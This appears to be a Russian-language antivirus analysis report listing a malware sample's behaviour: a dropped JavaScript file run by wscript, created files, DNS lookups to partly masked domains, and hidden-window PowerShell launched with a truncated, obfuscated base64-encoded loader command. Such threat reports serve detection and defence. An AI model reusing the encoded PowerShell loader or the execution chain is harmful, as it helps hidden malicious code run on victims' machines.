Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '<SYSTEM32>\wscript.exe' "%WINDIR%\Temp\SjrwBcwkftK.js"
Запускает на исполнение (эксплоит)
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1904
Изменения в файловой системе
Создает следующие файлы
- %WINDIR%\temp\sjrwbcwkftk.js
- %TEMP%\824714.cvr
Сетевая активность
UDP
- DNS ASK oz####75936b8d.com
- DNS ASK b7####7q2jsxds.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtAC...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -E IAAoACAALgAoACcAbgBFAHcAJwArACcALQBPAEIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIAAgAFMAWQBTAFQAYABlAG0AYAAuAGkAbwBgAC4AQwBPAE0AUABSAGAARQBgAHMAUwBpAE8AYABOAC4AZABlAGYAbABBAFQAZQBgAFMAVABSAEUAQQBtAC...
